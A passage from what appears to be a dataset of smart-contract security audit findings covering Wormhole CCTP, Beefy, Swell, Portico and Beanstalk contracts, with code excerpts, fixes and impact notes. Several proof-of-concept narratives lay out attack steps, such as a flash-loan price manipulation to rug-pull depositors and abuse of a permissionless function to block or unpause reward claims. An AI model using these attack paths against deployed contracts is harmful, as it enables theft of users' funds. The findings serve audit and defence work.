CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, ""chain already registered"");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n","Consider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, ""CCTP domain already registered for a different foreign chain"");\\n```\\n","The impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.","```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, ""chain already registered"");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n" +Lack of Governance action to update registered emitters,low,"The Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n",The addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.,"In the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue designate a low severity issue.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.",```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n +Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expires,low,"Wormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters:: expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, ""guardian set has expired"");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.","The practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.","There is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintReceipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.","```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n" +`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updated,medium,"`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract to enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.",1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.,The old `unirouter` contract will continue to have ERC20 token approvals for `StratFeeManagerInitializable` so it can continue to spend the protocol's tokens when this is not the protocol's intention as the protocol has changed `unirouter`.,"```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n" +Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parameters,low,"While `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the deposit",Beefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.,Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.,```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n +"`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge cases",low,"In Uniswap V3 liquidity providers can only provide liquidity between price ranges `[1.0001^{MIN_ TICK};1.0001^{MAX_TICK})`. Therefore these are the min and max prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DOS deposits, withdrawals and harvests when they should be allowed for as long as the state holds.","Consider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\n",,```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n +Withdraw can return zero tokens while burning a positive amount of shares,low,Invariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n,Change the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\n,Protocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.,```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n +`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`,medium,"When users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.",Two possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.,,```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n +Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracle,low,"`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle to fetch an off-chain data source for Swell's current reserves.\\nThe Oracle `Swell ETH PoR` is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the ""Show More Details"" box in the top-right corner of the table), however no staleness check is implemented by RepricingOracle:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n","Implement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.","If the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, `RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.","```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n" +Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplication,low,`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.,Refactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\n,"Slightly less `swETH` will be minted to depositors. While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from ""@prb/math/src/UD60x18.sol"";\\n\\nimport ""forge-std/Test.sol"";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\n",```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n +Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused state,medium,"Consider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.",Two possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.,"An attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.","```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n" +`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokens,medium,"`the kenneth` stated in telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`, however when receiving Fee-On-Transfer tokens and storing the reward amount the accounting does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n","In `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. If it is not used by off-chain processing then consider removing it.",The actual reward calculation is done off-chain and is outside the audit scope nor do we have visibility of that code. But events emitted by `RewardsDistributor` and the stored incentive token deposits in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.,"```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n" +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\n",Contract unnecessarily exposed to gas griefing attacks.,"```\\n(bool sent, ) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n" +No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specified,medium,"`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. This current configuration is an example of the ""MinTokensOut For Intermediate, Not Final Amount"" vulnerability class; as the minimum received tokens check is before the deduction of `relayerFeeAmount` a user will always receive less tokens than their specified minimum if `relayerFeeAmount > 0`.","Ensure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.",Bridged tokens stuck or user receives less tokens than their specified minimum.,```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.",Contract unnecessarily exposed to gas griefing attacks.,"```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n" +The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forward,high,"Within the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n",Scale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n```\\n\\n\\clearpage,"The mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestonStem(token) + (current \\ season - getMilestonStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. Notably, the milestone stem is now stored with 10 decimals (untruncated), hence why the second term of the abstraction has omited the `10^{6}` division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not escalated by $10^{6}$ then the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This is mandatory to be handled within the upgrade otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used 